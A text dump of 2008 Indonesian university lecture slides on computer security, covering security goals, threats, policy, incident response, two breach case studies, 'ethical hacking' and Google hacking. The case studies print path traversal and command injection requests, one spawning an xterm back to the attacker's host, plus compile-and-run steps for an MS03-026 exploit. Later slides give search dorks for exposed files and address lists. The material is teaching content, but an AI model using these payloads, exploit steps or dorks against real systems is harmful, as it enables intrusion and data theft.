Keamanan Sistem Komputer class

Reviews

Tags

Stats

views:: 722
rating:: not rated
reviews:: 0
posted:: 5/17/2009
language:: English
pages:: 0

Keamanan Sistem Komputer Computer Security RUDI LUMANTO UNIVERSITAS BUDILUHUR RUDI LUMANTO UNIVERSITAS BUDILUHUR Semester 2 / 2008 Referensi dan Kontak Info Matt Bishop, “Computer Security : Art and Science”, Addison-Wesley 2003, 1084 pages. Deborah Russel, G.T Gangemi Sr, “COMPUTER SECURITY BASIC”, O’Reilly & Associates John E Caravan, “FUNDAMENTALS OF NETWORK SECURITY”, Artech House internet KONTAK : RUDI LUMANTO rudi_lumanto@yahoo.com 0815-1036-9754 Universitas Budiluhur SABTU 13:15- 15:45 RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 KRITERIA PENILAIAN TUGAS (2-4 report) : 20% UJIAN TENGAH SEMESTER : 30% ABSENSI KEHADIRAN : 10 % UJIAN AKHIR SEMESTER : 40% RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 DAFTAR SILABUS Overview / Pengenalan Keamanan Sistem Komputer Keamanan Operating Sistem/Software Keamanan Fisik/Hardware Keamanan Jaringan/Internet Ancaman Software : virus, worm dll Ancaman Internet : Serangan TCP, DNS, Dos dll RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 DAFTAR SILABUS Firewall Intrusion Detection System (IDS) Mengenal Cryptography Aplikasi Cryptography Skema Kerberos VPN Analisa kebocoran RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 KEAMANAN SISTEM KOMPUTER OVERVIEW Keamanan Software Ancaman Sofware : Virus, Worm dll Keamanan Hardware Keamanan Jaringan Ancaman Internet : TCP Attack, DOS, DNS dll Firewall Basic Cryptography Aplikasi Cryptography Skema Kerberos VPN Analisa Kebocoran RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 KEAMANAN SISTEM KOMPUTER 1. OVERVIEW RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 outline Why Computer Security ? Computer Security Goals. Threats, Vulnerabilities, Attacks Policy and measure Simple cases and tools Making a good security policy RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Why Computer Security To protect company/individual assets – Hardware, software and INFORMATION (data, ability and Reputation) To gain a competitive advantage – How many people will use a bank’s internet banking system if they knew that the system had been hacked in the past ? To comply with regulatory requirements To keep your job RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Computer Security Goals C onfidentiality I ntegrity A vailability Confidentiality : Prevention of unauthorized access to data, and accidental data disclosures Integrity : Prevention of improper modifications of the data, either intentionally or accidentally. 1) Modification of the data by unauthorized parties. 2) Operation on data by authorized personnel in ways that is incompatible with the nature (syntax) of the data, leading to its corruption. 3) Any modification to append-only records, to alter their evidence value. Availability : Measures to protect data should not result in making it cumbersome to access and modify the data in ways in which it was intended. RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Threats,vulnerabilities and Attacks THREATS Anything that can disrupt the operation, functioning, integrity or availability of computer system. Stand alone threats – Threat arise without any connection to other system, Ex: virus, password cracker Connection threats – Threat arise because of connection to other system RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 ◆Threats Arising from Connection to the other computers Information leaks •• A database of customer information, including credit card Information leaks numbers, is leaked from an Internet service provider. •• The contents of the web site of a public institution are rewritten with the political messages of a dissident group. Falsification Falsification Denial of services •• A bookshop site is attacked and its server goes down, Denial of services discontinuing service. Impersonation Impersonation •• An intruder fakes a membership site for the purchase of merchandise. •• A corporate network administering a server used as a platform for attacking other sites was sued for compensation for the damage caused. Attack platform Attack platform RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Vulnerabilities Weakness in the design, configuration or implementation of a computer system that renders it susceptible to a threat. 1. POOR DESIGN Hardware and software system that contain design flaws that can be exploited. Ex: sendmail flaws in early version of unix that allowed hackers to gain privileged root access 2. POOR IMPLEMENTATION System that incorrectly configured because of in-experience, insufficient training or sloppy work. Ex: a system that does not ave restricted access Privileged on critical executable file. 3. POOR MANAGEMENT Inadequate procedures and insufficient checks and balances. Ex: No documentation and monitoring RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Critical Vulnerabilities and Vulnerability Scanning Certain security vulnerabilities are declared critical when they are (or are about to) being actively exploited and represent a clear and present danger Upon notification of a critical vulnerability, systems must be patched by a given date or they will be blocked from network access RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 ◆Types of Vulnerability OS/Program name Index Server ( WindowsNT) Index Service (Windows2000) telnetd (FreeeBSD 4.3 and earlier, Red Hat 7.1 and earlier, etc.) sadmind (Solaris2.3 – 7) Cause ISAPI extension idq.dll overflow Buffer overflow during AYT optional packet processing Buffer overflow during NETMGT_PROC_SERVICE request processing Overflow in an int variable in detect_attack function Buffer overflow in a shared library Buffer overflow during TSIG processing Format string bug in site-exec and setproctitle functions Access to a file outside root directory permitted when path name is UNICODE Influence Local system permission seized by an outsider Telnetd permission (normally root) seized by an outsider Command executable with root permission by an outsider Command executable with root permission by an outsider Arbitrary command executable with root permission by an outsider Operation permission (normally root) seized by an outsider Execution permission (normally root) seized by an outsider Shell command executed with IUSR_Machinename permission by an outsider SSH 1.2.31 OpenSSH 2.2 and earlier dtspcd (AIX 4.3/5.1, HP-UX 11.11, Solaris 8, etc.) Bind8.2x(Red Hat, Turbolinux, Solaris, AIX , etc.) wu-ftpd 2.6.0 and earlier (Red Hat linux 6.2 and earlier, etc.) IIS4.0 (WIndowsNT) IIS5.0 (Windows2000) RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 ATTACKS A specific technique used to exploit a vulnerabilty. Ex: a threat could be a denial of service, a vulnerability is in the design of OS, and an attack could be a “ping of death” Passive attacks – Gathering information by monitoring and recording traffic on the network, or by social engineering. Ex: packet sniffing, traffic analysis Active attacks – Overt actions on the computer system. RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 ◆Denial of Service Target host Target host Service downed due to overload • Large volume data • Packets causing a system down Attack platform Start attack!! RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Policy and Measure Security Trinity : foundation for all security policies and measures that an organization develops and deploy Security What is Security ? Definitions from the Amer.Herit.Dic : - Freedom from risk or danger:safety - Measures adopted …. To prevent a crime. Computer Security Measures -Mechanisms to prevent, detect and recover from threats and attacks or for auditing purposes. ry / ve c o ns e R e s po Re De RUDI LUMANTO t ec tio n Prevention UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Key point Computer Security is not only a technical problem, it is a business and people problem. The technology is the easy part, the difficult part is developing a security policies/plan that fits the organization’s business operation and getting people to comply with the plan. Social engineering : non-technical methods hackers employ to gain access to system, refers to the process of convincing a person to reveal information RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Security operations -Prevention againts accidental capture or modification of information Detection of all improper access to data and system resources -Recovery from unauthorized access, restoring data values, system integrity etc Policies and Procedures -User privileged -Data backup -Security tools to deploy -Monitoring the integrity -Response to Incident -User role, etc RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 ◆Types of Users Hacker Cracker Script kiddy A user who tries to obtain access using advanced knowledge and techniques. A user who attempts sabotage and other subversive activities with malicious motives A user who has little technical capability and uses tools available on the Internet when attempting cyber attacks Corporate network Intrusion, subversion, sabotage Vulnerability Subversion, sabotage RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 ◆Integrity Check Tool /etc/passwd file #hash value (MD5) dc577ef5f97b671781c04425737bc4df File editing/falsification Mismatch ... Altered!! b0ed782bbd4c8445f07538a3ede788eb RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 ◆Security Tools and Security Products Malicious user Malicious user Corporate network Internet Server/client Network security Countermeasures against hacking • Router(Filtering) • Firewall(VPN) • N-IDS • Vulnerability audit • Virus scan • Encryption Server security • H-IDS • Log monitoring • Falsification prevention • Vulnerability audit • Virus scan • Encryption(SSH) UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Miscellaneous RUDI LUMANTO ◆Firewall? Internet ① HTTP ② HTTP Client ③ FTP Public FTP server Intranet Public WWW server ④ HTTP ⑤Unspecific AP Server Client Authentication • Packet filtering GW type firewall • Application gateway • Stateful inspection RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 ◆Encryption VPN(Virtual Private Network)=Leased Line the Internet e.g. IPsec IPv6 Remote access user Encrypted communication Provider A Provider C FW/VPN router Internet IX Provider B Provider D FW/VPN router RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Response to Computer Security Incidents Mandatory incident reporting; – Report all suspicious activity: ex : • If urgent to Computer Helpdesk • Or to system manager (if immediately available); • Non-urgent to computer_security@fnal.gov; – Incidents investigated by Computer Incident Response Team (CIRT); – Not to be discussed! RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 CIRT (Computer Security Incident Response Team) Security experts drawn from throughout the lab Investigate (“triage”) initial reports; Coordinate investigation overall; Work with local system managers; Call in technical experts; May take control of affected systems; Maintain confidentiality; RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Other Rules for General Systems Warning system; – First time warning, repeat offense disciplinary action; Unauthorized or malicious actions; – Damage of data, unauthorized use of accounts, denial of service, etc., are forbidden; Ethical behavior; – Same standards as for non-computer activities; Restricted central services; – May only be provided by Computing Division; Security & cracker tools; – Possession (& use) must be authorized; RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 User role Guard against malicious code in email – Don’t open attachments unless you are sure they are safe – Don’t trust who email is from – Updated and enabled virus signatures Guard against malicious code from web browsing RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 User role - 2 Obey Strong Authentication Policy (Kerberos) – Don’t run network services (login or read write ftp) unless they demand Kerberos authentication – Treat your kerberos password as a sacred object (never expose it over the network) Promptly report potential computer security incidents – Ex : call by telephone or email to computer_security@fnal.gov (if in US) – Follow CIRT instructions during incidents (especially about keeping infected machines off the network and preserving the status of an infected machine for expert investigation) RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Example of Policy Issues Data backup Incidental use Privacy Offensive material Licensing RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Data Backup Policy - Users – Users (data owners) responsible for determining: • What data requires protection; • How destroyed data would be recovered, if needed; • Coordinating backup plan w/ sysadmins; – or doing their own backups; • If the backup is done for you it might be worth occasionally checking that you can really retrieve the data RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Privacy of Email and Files May not use information in another person’s files seen incidental to any activity (legitimate or not) for any purpose w/o either explicit permission of the owner or a “reasonable belief the file was meant to be accessed by others.” – Whether or not group/world accessible; – “Group” files implicitly may be used by the group for the mission of the group; RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 A simple case and tool ( seing the technique/informasition behind a case) RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 A Security Case A company called “Acme-art. Inc” doing an online business in the internet. They have a database that record all customers information included their credit card information and connected to their site www.acme-art.com that protected by firewall. 31 October 2001 a hacker intrude to their system and stole all credit card information, Then put the information into newsgroup usenet. A few hour then the company has loss million dollars , bad reputation and have to invest many more money to keep their business alive. What happen ? How it could be happen ? Fact : The firewall is installed. And the internet access can only be done through http port 80. RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Security team investigation: Sample case 1 Looking for clues in log file… 10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008 10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452 10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468 10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912 10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891 10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680 10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640 10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652 10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580 10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272 10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008 10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358 10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358 10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228 10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0 +%26| HTTP/1.0" 200 1228 RUDI LUMANTO A B C D E F UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Security team investigation: Part A in log file 10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008 10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452 10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468 10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912 10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891 Sample case 1 Browsing ……. RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Security team investigation: Part B in log file Sample case 1 10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680 10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640 10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652 10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580 Browsing ……. RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Security team investigation: Sample case 1 Part C in log file 10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272 Trying direct access …. Error response RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Security team investigation: Sample case 1 Part D in log file 10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008 10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358 Attacking … Security Hole 1 RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Security team investigation: Sample case 1 Perl script Security hole 1: validation form for parameter variable will be transfer to index.cgi script RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Security team investigation: Sample case 1 Part E in log file 10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358 Attacking … Security Hole 1 Recovering passwd file RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Security team investigation: Passwd file root:x:0:0:root:/root:/bin/bash …… …… …… Lion:x:500:500::/home/lion:/bin/bash Sample case 1 Security hole 1 effect: recovering important “passwd” files RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Security team investigation: Sample case 1 Part F in log file 10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228 10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0 +%26| HTTP/1.0" 200 1228 Attacking … Security Hole 2 Direct execution to server commands RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Security team investigation: Sample case 1 10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0 +%26| HTTP/1.0" 200 1228 RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Information/technique behind the case Information about target HTTP Structure CGI/PERL LINUX sytem and its command RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Httpd file default structures what is the web site structure ? Lisv01 /(root) home u01 u02 u03 … public_html (default user’s directory) var www html sbin log bin dev etc httpd usr … init.d httpd httpd conf (default document root) httpd.conf *Document root : The directory that holds HTML documents. * : file 11 RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Behind the Web Client-side application Client-side application WWW server WWW browser Internet/ Intranet WWW server_software HTML & Script Execute application JAVA SCRIPT WWW server Network-loading application Network-loading application WWW browser Application Internet/ Intranet WWW server_software Application ＷＷＷﾌﾞﾗｳｻﾞ Execute application Server-side application Server-side application WWW browser Internet/ Intranet JAVA Applet, Active X WWW server WWW Server _software Application CGI, Active Server Pages Execute application RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Sampe case 2 RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Sample case 2 After a period of new reqruitment, a server in a company suddenly crash down. Company network become unavailable for a while and it led to the much loss in production. What happen ? How it could be happen ? No Log files indication !!! RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Sample case 2 Security team investigation: Looking for clues by social engineering One new employee install the windows 2000 server in his computer and connect to the LAN with global IP address. Other Clues : 1. Nessus report on vulnerabilies in windows 2000 2. exploit program available Analysis of Host Address of Host 192.168.27.31 Port/Service ftp (21/tcp) smtp(25/tcp) http (21/tcp) nntp (119/tcp) msrpc(135/tcp) Netbios-ssn (139/tcp) https (443/tcp) Microsoft-ds (445/tcp) …. …. Issue regarding port Security hole found Security hole found Security hole found Security hole found Security hole found Security not found Security not found Security hole found …. …. UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Nessus report on Windows 2000 server after IIS installation 192.168.27.31 192.168.27.31 192.168.27.31 192.168.27.31 192.168.27.31 192.168.27.31 192.168.27.31 …… …… RUDI LUMANTO Sample case 2 NESSUS report in detail Other references: IAVA:2003-A-0012 NESSUS ID:11835 Vulnerability msprc(135/tcp) The remote host is running a version of windows which has a flaw in its RPC interface which may allow an attacker to execute arbitrary code and gain SYSTEM privileges. There is at least one WORM which is currently exploiting this vulnerability. Namely, the MsBlaster worm. Solution : see http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx Risk factor: high CVE:CAN-2003-0352 BID:8205 Other referemces: IAVA:2003-A-0011 NESSUS ID: 11806 Warning msprc(135/tcp) Distributed Computing Environment (DCE) services running on the remote host RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Sample case 2 NESSUS ID : Identity Number of Vulnerability Check by NESSUS BID : Buqtraq ID : related documentation regarding the vulnerability including exploit code , see: security focus site simulation 1. Downloading the exploit code source file (from security focus site or Whoppix CD） $cp /KNOPPIX/pentest/exploits/securityfocus/8205/oc192-dom.c 2. Compiling source file $gcc oc192-dom.c 3. executing the exploit into the IP target machine $a.out -d 192.168.94.204 Get the system access C:>WINNT\SYSTEM32\ RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Information/technique behind the case -Insufficient security orientation for new employee -Lack of knowledge about OS -There is always exploit code in the internet -Lack of information about update RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Sampe case 3 what kind of security techniques behind ? RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 The warrior of the NET RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Making a good security policy RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Making a good security policy Penetration Test/Ethical Hacking – Understanding what is inside the hackers mind Security Trinity Security Goals RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Definition of "Ethical Hacking“ An ethical hacking is where a computer and network expert who attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. To test a security system, ethical hacking uses the same methods as their less principled counterparts, but report problems instead of taking advantage of them. Ethical hacking is also known as penetration testing, intrusion testing, and red teaming. Individuals involved in ethical hacking is sometimes called a white hat, a term that comes from old Western movies, where the "good guy" wore a white hat and the "bad guy" wore a black hat. One of the first examples of ethical hacking at work was in the 1970s, when the United States government used groups of experts called red teams to hack its own computer systems. According to Ed Skoudis, Vice President of Security Strategy for Predictive Systems' Global Integrity consulting practice, ethical hacking has continued to grow in an otherwise lackluster IT industry, and is becoming increasingly common outside the government and technology sectors where it began. Many large companies, such as IBM, maintain employee teams of ethical hackers. RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Inside the Hackers Mind - Successfully attack and Save - Focus on the target Never use your own information Never leave your footstep Can ever back again HACKERS PROCEDURE RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Hackers Procedure/step Targeting Scanning Remote Attack Local Attack Log removing / deception Space using Time stamp Back door 1. Information gathering 1. Information gathering 2. Attack, intrusion 2. Attack, intrusion 3. Unauthorized act 3. Unauthorized act 4. Actions taken after 4. Actions taken after unauthorized act unauthorized act RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Example of Targeting All Informations about the target Technique name : Web browser targeting Goals : personal information about the target Operation base - any web browser with search engine site (google) - online database (WHOIS, IPCONVERSION,etc) Location, related company/organization, news, telephone number, Contact (mail address), web author idea/though,/behaviour, site software RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Targeting with google By using the basic search techniques combined with Google's advanced operators, anyone can perform information-gathering and vulnerability-searching using Google. This technique is commonly referred to as Google hacking. RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Google hacking Mastering google using its standard options – – – – Double quotation ….to be recognized a keyword as a phrase Hyphen (-) …. If you want to exclude words contain keyword site: …. searching only inside the site * …. wildcard. Use with double quotation to find any indicate word – Intitle: – Inurl: – Intext: web – Filetype: file – Phonebook: RUDI LUMANTO …. search limited only to web title …. search limited only to web page URL …. search limited only to main page of the …. search focusing on extention type of …. search telephone number UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Google hacking Mastering google using its options – site: …. searching only inside the site “hacker” site:www.cnn.com or site:www.cnn.com hacker This query searches for the word hacker, restricting the search to the http://www.cnn.com web site. How many pages on the CNN web server contain the word hacker RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Google hacking – * Mastering google using its options …. wildcard. Use with double quotation to find any indicate word “He is a * Hacker” RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Google hacking Mastering google using its standard options – intitle: …. search limited only to web title intitle: “Hacker” RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Google hacking Mastering google using its standard options – Inurl: …. search limited only to web page URL inurl: www.securityfocus.com RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Google hacking Mastering google using its standard options – intext: …. search limited only to main page of the web intext: “earthquake” RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Google hacking Mastering google using its standard options – Filetype: …. search focusing on extention type of file “hacking” filetype:ppt "whoppix" filetype:iso RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 Google hacking Mastering google using its standard options – Phonebook: …. search telephone number phonebook: John Doe CA RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 More on Google hacking Searching the site inside (that actually) not explore to public Finding on server directory listing Directory listings provide a list of files and directories in a browser window instead of the typical text-and graphics mix generally associated with web pages. These pages offer a great environment for deep information gathering Most directory listings begin with the phrase Index of, which also shows in the title. An obvious query to find this type of page might be intitle:index.of which may find pages with the term index of in the title of the document. Unfortunately, this query will return a large number of false positives, such as pages with the following titles: Index of Native American Resources on the Internet LibDex—Worldwide index of library catalogues Iowa State Entomology Index of Internet Resources UNIVERSITAS BUDILUHUR , Semester 2 / 2008 RUDI LUMANTO More on Google hacking Combination google options on queries Several alternate queries that provide more accurate results: intitle:index.of "parent directory" intitle:index.of name size These queries indeed provide directory listings by not only focusing on index.of in the title, but on keywords often found inside directory listings, such as parent directory, name, and size. Obviously, this search can be combined with other searches to find files of directories located in directory listings. Example: Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“ Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“ intitle:bbs bbs.dat inurl:"Index of" intitle:“Index of“ RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 More on Google hacking Example: Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data" RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 More on Google hacking Example: Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“ intitle:bbs RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 More on Google hacking Example: bbs.dat inurl:"Index of" intitle:“Index of“ RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 More on Google hacking Example: searching database of address people written in csv focusing to japan site filetype:csv address site:jp RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 More on Google hacking Example: searching database of address people written in EXCEL focusing to UK site filetype:xls address site:uk RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008 RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester 2 / 2008